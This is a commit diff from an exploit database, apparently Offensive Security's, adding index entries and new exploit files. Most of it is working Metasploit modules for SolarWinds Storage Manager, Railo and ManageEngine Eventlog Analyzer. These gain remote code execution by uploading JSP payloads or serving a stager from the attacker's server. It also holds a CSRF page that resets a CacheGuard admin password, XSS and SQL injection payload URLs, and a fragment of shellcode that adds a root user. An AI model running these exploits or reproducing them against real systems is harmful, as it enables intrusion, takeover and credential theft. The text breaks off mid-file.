Updated 09_17_2014

This commit is contained in:
Offensive Security 2014-09-17 04:44:23 +00:00
parent 1d4c17cad7
commit d1f84651f9
23 changed files with 1238 additions and 2 deletions

View file

@ -31197,3 +31197,24 @@ id,file,description,date,author,platform,type,port
34644,platforms/php/webapps/34644.txt,"Silurus Classifieds wcategory.php ID Parameter XSS",2009-08-06,Moudi,php,webapps,0
34645,platforms/php/webapps/34645.txt,"Silurus Classifieds search.php keywords Parameter XSS",2009-08-06,Moudi,php,webapps,0
34646,platforms/php/webapps/34646.txt,"Blog Ink (Blink) Multiple SQL Injection Vulnerabilities",2009-08-03,Drosophila,php,webapps,0
34649,platforms/php/webapps/34649.txt,"Netautor Professional 5.5 'login2.php' Cross Site Scripting Vulnerability",2010-09-17,"Gjoko Krstic",php,webapps,0
34650,platforms/php/webapps/34650.txt,"e-Soft24 Flash Games Script 1.0 Cross Site Scripting Vulnerability",2009-08-30,"599eme Man",php,webapps,0
34651,platforms/php/webapps/34651.txt,"e-Soft24 Jokes Portal Script Seo 1.0 Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0
34652,platforms/php/webapps/34652.txt,"e-Soft24 PTC Script 1.2 'login.php' Multiple Cross Site Scripting Vulnerabilities",2009-08-30,"599eme Man",php,webapps,0
34653,platforms/php/webapps/34653.txt,"e107 0.7.23 Multiple SQL Injection Vulnerabilities",2010-09-17,"High-Tech Bridge SA",php,webapps,0
34654,platforms/windows/remote/34654.c,"SWiSH Max3 DLL Loading Arbitrary Code Execution Vulnerability",2010-09-20,anT!-Tr0J4n,windows,remote,0
34655,platforms/php/webapps/34655.txt,"Open Classifieds Multiple Cross Site Scripting Vulnerabilities",2009-08-28,Moudi,php,webapps,0
34656,platforms/php/webapps/34656.txt,"x10 MP3 Automatic Search Engine 1.6.5 includes/video_ad.php pic_id Parameter XSS",2009-08-29,Moudi,php,webapps,0
34657,platforms/php/webapps/34657.txt,"x10 MP3 Automatic Search Engine 1.6.5 linkvideos_listing.php category Parameter XSS",2009-08-29,Moudi,php,webapps,0
34658,platforms/php/webapps/34658.txt,"x10 MP3 Automatic Search Engine 1.6.5b templates/header1.php id Parameter XSS",2009-08-29,Moudi,php,webapps,0
34659,platforms/php/webapps/34659.txt,"x10 MP3 Automatic Search Engine 1.6.5b video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0
34660,platforms/php/webapps/34660.txt,"x10 MP3 Automatic Search Engine 1.6.5b embed.php name Parameter XSS",2009-08-29,Moudi,php,webapps,0
34661,platforms/php/webapps/34661.txt,"x10 MP3 Automatic Search Engine 1.6.5b info.php name Parameter XSS",2009-08-29,Moudi,php,webapps,0
34662,platforms/php/webapps/34662.txt,"x10 MP3 Automatic Search Engine 1.6.5b lyrics.php id Parameter XSS",2009-08-29,Moudi,php,webapps,0
34663,platforms/php/webapps/34663.txt,"x10 MP3 Automatic Search Engine 1.6.5b adult/video_listing.php key Parameter XSS",2009-08-29,Moudi,php,webapps,0
34666,platforms/php/webapps/34666.py,"ALCASAR <= 2.8.1 - Remote Root Code Execution Vulnerability",2014-09-15,eF,php,webapps,80
34668,platforms/windows/remote/34668.txt,"Http File Server 2.3.x - Remote Command Execution",2014-09-15,"Daniele Linguaglossa",windows,remote,80
34669,platforms/multiple/remote/34669.rb,"Railo Remote File Include",2014-09-15,metasploit,multiple,remote,80
34670,platforms/multiple/remote/34670.rb,"ManageEngine Eventlog Analyzer Arbitrary File Upload",2014-09-15,metasploit,multiple,remote,8400
34671,platforms/java/remote/34671.rb,"SolarWinds Storage Manager Authentication Bypass",2014-09-15,metasploit,java,remote,9000
34672,platforms/linux/webapps/34672.txt,"CacheGuard-OS 5.7.7 - CSRF Vulnerability",2014-09-15,"William Costa",linux,webapps,8090

Can't render this file because it is too large.

144
platforms/java/remote/34671.rb Executable file
View file

@ -0,0 +1,144 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
def initialize(info = {})
super(update_info(info,
'Name' => 'SolarWinds Storage Manager Authentication Bypass',
'Description' => %q{
This module exploits an authentication bypass vulnerability in Solarwinds Storage Manager.
The vulnerability exists in the AuthenticationFilter, which allows to bypass authentication
with specially crafted URLs. After bypassing authentication, is possible to use a file
upload function to achieve remote code execution. This module has been tested successfully
in Solarwinds Store Manager Server 5.1.0 and 5.7.1 on Windows 32 bits, Windows 64 bits and
Linux 64 bits operating systems.
},
'Author' =>
[
'rgod <rgod[at]autistici.org>', # Vulnerability Discovery
'juan vazquez' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
['ZDI', '14-299']
],
'Privileged' => true,
'Platform' => %w{ linux win },
'Arch' => ARCH_JAVA,
'Targets' =>
[
['Solarwinds Store Manager <= 5.7.1', {}]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 19 2014'))
register_options(
[
Opt::RPORT(9000)
], self.class)
end
def check
res = send_request_cgi({
'uri' => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=----#{rand_text_alpha(10 + rand(10))}"
})
if res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
return Exploit::CheckCode::Vulnerable
end
Exploit::CheckCode::Safe
end
def exploit
jsp_info = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
print_status("#{peer} - Uploading Information Gathering JSP #{jsp_info}...")
if upload(jsp_info, jsp_path)
print_good("#{peer} - JSP payload uploaded successfully")
else
fail_with(Failure::Unknown, "#{peer} - Information Gathering JSP upload failed")
end
res = execute(jsp_info)
if res && res.code == 200 && res.body.to_s =~ /Path:(.*)/
upload_path = $1
print_good("#{peer} - Working directory found in #{upload_path}")
register_file_for_cleanup(::File.join(upload_path, jsp_info))
else
print_error("#{peer} - Couldn't retrieve the upload directory, manual cleanup will be required")
print_warning("#{peer} - #{jsp_info} needs to be deleted manually")
end
jsp_payload = "#{rand_text_alphanumeric(4 + rand(32-4))}.jsp"
print_status("#{peer} - Uploading JSP payload #{jsp_payload}...")
if upload(jsp_payload, payload.encoded)
print_good("#{peer} - JSP payload uploaded successfully")
else
fail_with(Failure::Unknown, "#{peer} - JSP payload upload failed")
end
if upload_path
register_file_for_cleanup(::File.join(upload_path, jsp_payload))
else
print_warning("#{peer} - #{jsp_payload} needs to be deleted manually")
end
print_status("#{peer} - Executing payload...")
execute(jsp_payload, 1)
end
def execute(jsp_name, time_out = 20)
res = send_request_cgi({
'uri' => normalize_uri("/", "images", "..", jsp_name),
'method' => 'GET'
}, time_out)
res
end
def upload(file_name, contents)
post_data = Rex::MIME::Message.new
post_data.add_part(contents,
"application/octet-stream",
nil,
"form-data; name=\"#{rand_text_alpha(4 + rand(4))}\"; filename=\"#{file_name}\"")
res = send_request_cgi({
'uri' => normalize_uri("/", "images", "..", "jsp", "ProcessFileUpload.jsp"),
'method' => 'POST',
'ctype' => "multipart/form-data; boundary=#{post_data.bound}",
'data' => post_data.to_s
})
if res && res.code == 200 && res.body && res.body.to_s =~ /Upload Successful!!/
return true
end
false
end
def jsp_path
jsp =<<-EOS
<%@ page language="Java" import="java.util.*"%>
<%
out.println("Path:" + System.getProperty("server.webapp.root"));
%>
EOS
jsp
end
end

View file

@ -17,7 +17,7 @@ open passwd , and write new root user with passwrd ( user: ALI pass: ALI ) , clo
setreuid() , execve('/bin/sh')
root@g3n3rall:~/Desktop/xpl# objdump -d f.o
root@user:~/Desktop/xpl# objdump -d f.o
f.o: file format elf32-i386
@ -190,7 +190,7 @@ Disassembly of section .text:
203: b0 01 mov $0x1,%al
205: b3 01 mov $0x1,%bl
207: cd 80 int $0x80
root@g3n3rall:~/Desktop/xpl#
root@user:~/Desktop/xpl#

104
platforms/linux/webapps/34672.txt Executable file
View file

@ -0,0 +1,104 @@
I. VULNERABILITY
-------------------------
CSRF vulnerabilities in CacheGuard-OS v5.7.7
II. BACKGROUND
-------------------------
CacheGuard is an All-in-One Web Security Gateway providing firewall,
web antivirus, caching, compression, URL filtering, proxy, high
availability, content filtering, bandwidth saving, bandwidth shaping,
Quality of Service and more.
III. DESCRIPTION
-------------------------
Has been detected a CSRF vulnerability in CacheGuard in
"/gui/password-wadmin.apl"
IV. PROOF OF CONCEPT
-------------------------
The application does not validate the parameter any csrf_token
"/gui/password-wadmin.apl".
<html>
<body onload="CSRF.submit();">
<br>
<br>
<form id="CSRF" action="https://10.200.210.123:8090/gui/password-wadmin.apl"
method="post" name="CSRF">
<input name="password1" value="admin@1234" type=hidden> </input>
<input name="password2" value="admin@1234" type=hidden> </input>
</form>
</body>
</html>
V. BUSINESS IMPACT
-------------------------
CSRF allow the execution attackers to modify settings or change
password of user administrator in CacheGuard, because this functions
are not protected by CSRF-Tokens.
VI. REQUIREMENTS
-----------------------
An Attacker needs to know the IP of the device.
An Administrator needs an authenticated connection to the device.
VII. SYSTEMS AFFECTED
-------------------------
Try CacheGuard-OS v5.7.7
VIII. SOLUTION
-------------------------
All functions must be protected by CSRF-Tokens.
http://www.kb.cert.org/vuls/id/241508
By William Costa
william.costa no spam gmail.com

View file

@ -0,0 +1,189 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit4 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::Remote::HttpServer
def initialize(info = {})
super(update_info(info,
'Name' => 'Railo Remote File Include',
'Description' => '
This module exploits a remote file include vulnerability in Railo,
tested against version 4.2.1. First, a call using a vulnerable
<cffile> line in thumbnail.cfm allows an atacker to download an
arbitrary PNG file. By appending a .cfm, and taking advantage of
a directory traversal, an attacker can append cold fusion markup
to the PNG file, and have it interpreted by the server. This is
used to stage and execute a fully-fledged payload.
',
'License' => MSF_LICENSE,
'Author' => [
'Bryan Alexander <drone@ballastsecurity.net>', # Discovery/PoC
'bperry' # metasploited
],
'References' => [
['CVE', '2014-5468'],
['URL', 'http://hatriot.github.io/blog/2014/08/27/railo-security-part-four/']
],
'Payload' => {
'Space' => 99999, # if there is disk space, I think we will fit
'BadChars' => "",
'DisableNops' => true,
'Compat' => {
'PayloadType' => 'cmd',
'RequiredCmd' => 'generic netcat perl ruby python bash telnet'
}
},
'Platform' => %w( unix ),
'Targets' =>
[
[
'Automatic',
{
'Platform' => [ 'unix' ],
'Arch' => ARCH_CMD
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 26 2014'))
register_options(
[
OptString.new('TARGETURI', [true, 'The base URI of the Railo server', '/railo-context/']),
OptInt.new('STAGEWAIT', [true, 'Number of seconds to wait for stager to download', 10])
], self.class)
end
def check
md5 = '6de48cb72421cfabdce440077a921b25' # /res/images/id.png
res = send_request_cgi(
'uri' => normalize_uri('res', 'images', 'id.png') # the targeturi is not used in this request
)
if !res
fail_with(Failure::Unknown, 'Server did not respond')
elsif !res.body
fail_with(Failure::Unknown, "Server responded without a body: #{res.code} #{res.message}")
end
new_md5 = Rex::Text.md5(res.body)
return Exploit::CheckCode::Appears if new_md5 == md5
Exploit::CheckCode::Safe
end
def exploit
if datastore['SRVHOST'] == '0.0.0.0'
fail_with(Failure::BadConfig, 'SRVHOST must be an IP address accessible from another computer')
end
url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s
@shell_name = Rex::Text.rand_text_alpha(15)
stager_name = Rex::Text.rand_text_alpha(15) + '.cfm'
start_service('Uri' => {
'Proc' => proc do |cli, req|
on_request_stager(cli, req)
end,
'Path' => '/' + stager_name
})
start_service('Uri' => {
'Proc' => proc do |cli, req|
on_request_shell(cli, req)
end,
'Path' => '/' + @shell_name
})
wh = '5000' # width and height
res = send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', 'thumbnail.cfm'),
'vars_get' => {
'img' => url + '/' + stager_name,
'height' => wh,
'width' => wh
}
)
if !res
fail_with(Failure::Unknown, 'Server did not respond')
elsif res.code != 500
fail_with(Failure::Unknown, "Server did not respond with the expected HTTP 500: #{res.code} #{res.message}")
end
print_status('Waiting for first stage to download...')
i = datastore['STAGEWAIT']
while !@staged && i > 0
select(nil, nil, nil, 1)
print_status("Waiting for #{i} more seconds...")
i = i - 1
end
@staged = false
if i == 0
fail_with(Failure::Unknown, 'Server did not request the stager.')
end
hash = Rex::Text.md5("#{url + "/" + stager_name}-#{wh}-#{wh}") # 5000 is width and height from GET
hash.upcase!
print_status('Executing stager')
send_request_cgi(
'uri' => normalize_uri(target_uri.path, 'admin', 'img.cfm'),
'vars_get' => {
'attributes.src' => '../../../../temp/admin-ext-thumbnails/' + hash,
'thistag.executionmode' => 'start'
}
)
end
def on_request_shell(cli, _request)
print_status('Sending payload')
send_response(cli, payload.encoded, {})
handler(cli)
end
def on_request_stager(cli, _request)
url = 'http://' + datastore['SRVHOST'] + ':' + datastore['SRVPORT'].to_s + '/' + @shell_name
stager = "<cfhttp method='get' url='#{url}'"
stager << " path='#GetDirectoryFromPath(GetCurrentTemplatePath())#..\\..\\..\\..\\..\\..\\'"
stager << " file='#{@shell_name}'>"
stager << "<cfexecute name='sh' arguments='#{@shell_name}' timeout='99999'></cfexecute>"
png = 'iVBORw0KGgoAAAANSUhEUgAAAAEAAAABCAYAAAAfFcS'
png << 'JAAAACklEQVR4nGMAAQAABQABDQottAAAAABJRU5ErkJggg=='
# A very small PNG file
png = Rex::Text.decode_base64(png)
stager.each_byte do |b|
png << b
end
png << 0x00
print_status('Sending stage. This might be sent multiple times.')
send_response(cli, png, 'Content-Type' => 'image/png')
@staged = true
handler(cli)
end
end

View file

@ -0,0 +1,343 @@
##
# This module requires Metasploit: http//metasploit.com/download
# Current source: https://github.com/rapid7/metasploit-framework
##
require 'msf/core'
class Metasploit3 < Msf::Exploit::Remote
Rank = ExcellentRanking
include Msf::Exploit::Remote::HttpClient
include Msf::Exploit::FileDropper
include Msf::Exploit::EXE
def initialize(info = {})
super(update_info(info,
'Name' => 'ManageEngine Eventlog Analyzer Arbitrary File Upload',
'Description' => %q{
This module exploits a file upload vulnerability in ManageEngine Eventlog Analyzer.
The vulnerability exists in the agentUpload servlet which accepts unauthenticated
file uploads and handles zip file contents in a insecure way. By combining both
weaknesses a remote attacker can achieve remote code execution. This module has been
tested successfully on versions v7.0 - v9.9 b9002 in Windows and Linux. Versions
between 7.0 and < 8.1 are only exploitable via EAR deployment in the JBoss server,
while versions 8.1+ are only exploitable via a JSP upload.
},
'Author' =>
[
'h0ng10', # Vulnerability discovery
'Pedro Ribeiro <pedrib[at]gmail.com>' # Metasploit module
],
'License' => MSF_LICENSE,
'References' =>
[
[ 'CVE', '2014-6037' ],
[ 'OSVDB', '110642' ],
[ 'URL', 'https://www.mogwaisecurity.de/advisories/MSA-2014-01.txt' ],
[ 'URL', 'http://seclists.org/fulldisclosure/2014/Aug/86' ]
],
'DefaultOptions' => { 'WfsDelay' => 5 },
'Privileged' => false, # Privileged on Windows but not on Linux targets
'Platform' => %w{ java linux win },
'Targets' =>
[
[ 'Automatic', { } ],
[ 'Eventlog Analyzer v7.0 - v8.0 / Java universal',
{
'Platform' => 'java',
'Arch' => ARCH_JAVA,
'WfsDelay' => 30
}
],
[ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Windows',
{
'Platform' => 'win',
'Arch' => ARCH_X86
}
],
[ 'Eventlog Analyzer v8.1 - v9.9 b9002 / Linux',
{
'Platform' => 'linux',
'Arch' => ARCH_X86
}
]
],
'DefaultTarget' => 0,
'DisclosureDate' => 'Aug 31 2014'))
register_options(
[
Opt::RPORT(8400),
OptInt.new('SLEEP',
[true, 'Seconds to sleep while we wait for EAR deployment (Java target only)', 15]),
], self.class)
end
def get_version
res = send_request_cgi({
'uri' => normalize_uri("event/index3.do"),
'method' => 'GET'
})
if res and res.code == 200
if res.body =~ /ManageEngine EventLog Analyzer ([0-9]{1})/
return $1
end
end
return "0"
end
def check
version = get_version
if version >= "7" and version <= "9"
# version 7 to < 8.1 detection
res = send_request_cgi({
'uri' => normalize_uri("event/agentUpload"),
'method' => 'GET'
})
if res and res.code == 405
return Exploit::CheckCode::Appears
end
# version 8.1+ detection
res = send_request_cgi({
'uri' => normalize_uri("agentUpload"),
'method' => 'GET'
})
if res and res.code == 405 and version == 8
return Exploit::CheckCode::Appears
else
# We can't be sure that it is vulnerable in version 9
return Exploit::CheckCode::Detected
end
else
return Exploit::CheckCode::Safe
end
end
def create_zip_and_upload(payload, target_path, is_payload = true)
# Zipping with CM_STORE to avoid errors decompressing the zip
# in the Java vulnerable application
zip = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
zip.add_file(target_path, payload)
post_data = Rex::MIME::Message.new
post_data.add_part(zip.pack, "application/zip", 'binary', "form-data; name=\"#{Rex::Text.rand_text_alpha(4+rand(4))}\"; filename=\"#{Rex::Text.rand_text_alpha(4+rand(4))}.zip\"")
data = post_data.to_s
if is_payload
print_status("#{peer} - Uploading payload...")
end
res = send_request_cgi({
'uri' => (@my_target == targets[1] ? normalize_uri("/event/agentUpload") : normalize_uri("agentUpload")),
'method' => 'POST',
'data' => data,
'ctype' => "multipart/form-data; boundary=#{post_data.bound}"
})
if res and res.code == 200 and res.body.empty?
if is_payload
print_status("#{peer} - Payload uploaded successfully")
end
register_files_for_cleanup(target_path.gsub("../../", "../"))
return true
else
return false
end
end
def pick_target
return target if target.name != 'Automatic'
print_status("#{peer} - Determining target")
version = get_version
if version == "7"
return targets[1]
end
os_finder_payload = %Q{<html><body><%out.println(System.getProperty("os.name"));%></body><html>}
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
target_dir = "../../webapps/event/"
if not create_zip_and_upload(os_finder_payload, target_dir + jsp_name, false)
if version == "8"
# Versions < 8.1 do not have a Java compiler, but can be exploited via the EAR method
return targets[1]
end
return nil
end
res = send_request_cgi({
'uri' => normalize_uri(jsp_name),
'method' => 'GET'
})
if res and res.code == 200
if res.body.to_s =~ /Windows/
return targets[2]
else
# assuming Linux
return targets[3]
end
end
return nil
end
def generate_jsp_payload
opts = {:arch => @my_target.arch, :platform => @my_target.platform}
payload = exploit_regenerate_payload(@my_target.platform, @my_target.arch)
exe = generate_payload_exe(opts)
base64_exe = Rex::Text.encode_base64(exe)
native_payload_name = rand_text_alpha(rand(6)+3)
ext = (@my_target['Platform'] == 'win') ? '.exe' : '.bin'
var_raw = rand_text_alpha(rand(8) + 3)
var_ostream = rand_text_alpha(rand(8) + 3)
var_buf = rand_text_alpha(rand(8) + 3)
var_decoder = rand_text_alpha(rand(8) + 3)
var_tmp = rand_text_alpha(rand(8) + 3)
var_path = rand_text_alpha(rand(8) + 3)
var_proc2 = rand_text_alpha(rand(8) + 3)
if @my_target['Platform'] == 'linux'
var_proc1 = Rex::Text.rand_text_alpha(rand(8) + 3)
chmod = %Q|
Process #{var_proc1} = Runtime.getRuntime().exec("chmod 777 " + #{var_path});
Thread.sleep(200);
|
var_proc3 = Rex::Text.rand_text_alpha(rand(8) + 3)
cleanup = %Q|
Thread.sleep(200);
Process #{var_proc3} = Runtime.getRuntime().exec("rm " + #{var_path});
|
else
chmod = ''
cleanup = ''
end
jsp = %Q|
<%@page import="java.io.*"%>
<%@page import="sun.misc.BASE64Decoder"%>
<%
try {
String #{var_buf} = "#{base64_exe}";
BASE64Decoder #{var_decoder} = new BASE64Decoder();
byte[] #{var_raw} = #{var_decoder}.decodeBuffer(#{var_buf}.toString());
File #{var_tmp} = File.createTempFile("#{native_payload_name}", "#{ext}");
String #{var_path} = #{var_tmp}.getAbsolutePath();
BufferedOutputStream #{var_ostream} =
new BufferedOutputStream(new FileOutputStream(#{var_path}));
#{var_ostream}.write(#{var_raw});
#{var_ostream}.close();
#{chmod}
Process #{var_proc2} = Runtime.getRuntime().exec(#{var_path});
#{cleanup}
} catch (Exception e) {
}
%>
|
jsp = jsp.gsub(/\n/, '')
jsp = jsp.gsub(/\t/, '')
jsp = jsp.gsub(/\x0d\x0a/, "")
jsp = jsp.gsub(/\x0a/, "")
return jsp
end
def exploit_native
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
# Fail if this is the case and ask the user to select an appropriate payload.
if @my_target['Platform'] == 'linux' and payload_instance.name =~ /Windows/
fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Linux target.")
end
jsp_name = "#{rand_text_alphanumeric(4+rand(32-4))}.jsp"
target_dir = "../../webapps/event/"
jsp_payload = generate_jsp_payload
if not create_zip_and_upload(jsp_payload, target_dir + jsp_name)
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
end
return jsp_name
end
def exploit_java
# When using auto targeting, MSF selects the Windows meterpreter as the default payload.
# Fail if this is the case and ask the user to select an appropriate payload.
if @my_target['Platform'] == 'java' and not payload_instance.name =~ /Java/
fail_with(Failure::BadConfig, "#{peer} - Select a compatible payload for this Java target.")
end
target_dir = "../../server/default/deploy/"
# First we generate the WAR with the payload...
war_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
war_payload = payload.encoded_war({ :app_name => war_app_base })
# ... and then we create an EAR file that will contain it.
ear_app_base = rand_text_alphanumeric(4 + rand(32 - 4))
app_xml = %Q{<?xml version="1.0" encoding="UTF-8"?><application><display-name>#{rand_text_alphanumeric(4 + rand(32 - 4))}</display-name><module><web><web-uri>#{war_app_base + ".war"}</web-uri><context-root>/#{ear_app_base}</context-root></web></module></application>}
# Zipping with CM_STORE to avoid errors while decompressing the zip
# in the Java vulnerable application
ear_file = Rex::Zip::Archive.new(Rex::Zip::CM_STORE)
ear_file.add_file(war_app_base + ".war", war_payload.to_s)
ear_file.add_file("META-INF/application.xml", app_xml)
ear_file_name = rand_text_alphanumeric(4 + rand(32 - 4)) + ".ear"
if not create_zip_and_upload(ear_file.pack, target_dir + ear_file_name)
fail_with(Failure::Unknown, "#{peer} - Payload upload failed")
end
print_status("#{peer} - Waiting " + datastore['SLEEP'].to_s + " seconds for EAR deployment...")
sleep(datastore['SLEEP'])
return normalize_uri(ear_app_base, war_app_base, rand_text_alphanumeric(4 + rand(32 - 4)))
end
def exploit
if datastore['SLEEP'] < 0
print_error("The SLEEP datastore option shouldn't be negative")
return
end
@my_target = pick_target
if @my_target.nil?
print_error("#{peer} - Unable to select a target, we must bail.")
return
else
print_status("#{peer} - Selected target #{@my_target.name}")
end
if @my_target == targets[1]
exploit_path = exploit_java
else
exploit_path = exploit_native
end
print_status("#{peer} - Executing payload...")
send_request_cgi({
'uri' => normalize_uri(exploit_path),
'method' => 'GET'
})
end
end

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43290/info
Netautor Professional is prone to a cross-site scripting vulnerability because it fails to sufficiently sanitize user-supplied data.
An attacker may leverage this issue to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
Netautor Professional 5.5.0 is vulnerable; other versions may also be affected.
http://www.example.com/netautor/napro4/home/login2.php?goback=%22%3Cscript%3Ealert%28document.location%29%3C/script%3E

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43297/info
e-Soft24 Flash Games Script is prone to a cross-site scripting vulnerability because it fails to properly sanitize user-supplied input.
An attacker may leverage this issue to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
e-Soft24 Flash Games Script 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/search_results.php?search_id='"><SCRIPT>alert(String.fromCharCode(88%2C83%2C83))<%2FSCRIPT><MARQUEE+BGCOLOR%3D"RED"><H1>Xss<%2FH1><%2FMARQUEE>&search=Search

14
platforms/php/webapps/34651.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/43303/info
e-Soft24 Jokes Portal Script Seo is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
e-Soft24 Jokes Portal Script Seo 1.0 is vulnerable; other versions may also be affected.
http://www.example.com/SearchAction.php?what='"><SCRIPT>alert(String.fromCharCode(88%2C83%2C83))<%2FSCRIPT><MARQUEE+BGCOLOR%3D"RED"><H1>Xss<%2FH1><%2FMARQUEE>&ssub=GO
http://www.example.com/forgot.html => put : '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><MARQUEE BGCOLOR="RED"><H1>Xss</H1></MARQUEE>
http://www.example.com/scripts/jokes-portal/SearchAction.php?what=%27%22%3E%3CSCRIPT%3Ealert%28String.fromCharCode%2888%2C83%2C83%29%29%3C%2FSCRIPT%3E%3CMARQUEE+BGCOLOR%3D%22RED%22%3E%3CH1%3EXss%3C%2FH1%3E%3C%2FMARQUEE%3E&ssub=GO

14
platforms/php/webapps/34652.txt Executable file
View file

@ -0,0 +1,14 @@
source: http://www.securityfocus.com/bid/43305/info
e-Soft24 PTC Script is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
e-Soft24 PTC Script 1.2 is vulnerable; other versions may also be affected.
http://www.example.com/login.php
1/ Connect you with : '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><MARQUEE BGCOLOR="RED"><H1>Xss</H1></MARQUEE>
2/ Password Forget : '"><SCRIPT>alert(String.fromCharCode(88,83,83))</SCRIPT><MARQUEE BGCOLOR="RED"><H1>Xss</H1></MARQUEE>

11
platforms/php/webapps/34653.txt Executable file
View file

@ -0,0 +1,11 @@
source: http://www.securityfocus.com/bid/43327/info
e107 is prone to multiple SQL-injection vulnerabilities because it fails to sufficiently sanitize user-supplied data before using it in an SQL query.
Exploiting these issues could allow an attacker to compromise the application, access or modify data, or exploit latent vulnerabilities in the underlying database.
e107 0.7.23 is vulnerable; other versions may also be affected.
http://www.example.com/e107_admin/download.php?cat.edit.999999%0Aunion%0Aselect%0A1,2,3,4,5,6,7
http://www.example.com/e107_admin/wmessage.php?create.edit.999999%0Aunion%0Aselect%0A1,2,user%28%29

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43335/info
Open Classifieds is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary HTML and script code in the browser of an unsuspecting user in the context of the affected site. This may let the attacker steal cookie-based authentication credentials and launch other attacks.
http://www.example.com/buy.php/?page=1>'><ScRiPt %0A%0D>alert(317235523215)%3B</ScRiPt>
http://www.example.com/contact.php?id=1<ScRiPt %0A%0D>alert(345135841734)%3B</ScRiPt>
http://www.example.com/tellafriend.php?id=1>"><ScRiPt %0A%0D>alert(366396570535)%3B</ScRiPt>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/includes/video_ad.php?pic_id=[XSS]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/linkvideos_listing.php?category=[XSS]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/templates/header1.php?id=[XSS]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/video_listing.php?category=[NB]&sort=[NB]&key=[XSS]

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
An attacker may leverage these issues to execute arbitrary script code in the browser of an unsuspecting user in the context of the affected site. This may allow the attacker to steal cookie-based authentication credentials and to launch other attacks.
x10 Media Automatic MP3 Search Engine 1.6.5 is vulnerable; other versions may also be affected.
http://www.example.com/embed.php?name="><script>alert(document.cookie);</script>

View file

@ -0,0 +1,9 @@
source: http://www.securityfocus.com/bid/43336/info
x10 Media Automatic MP3 Search Engine is prone to multiple cross-site scripting vulnerabilities because it fails to properly sanitize user-supplied input.
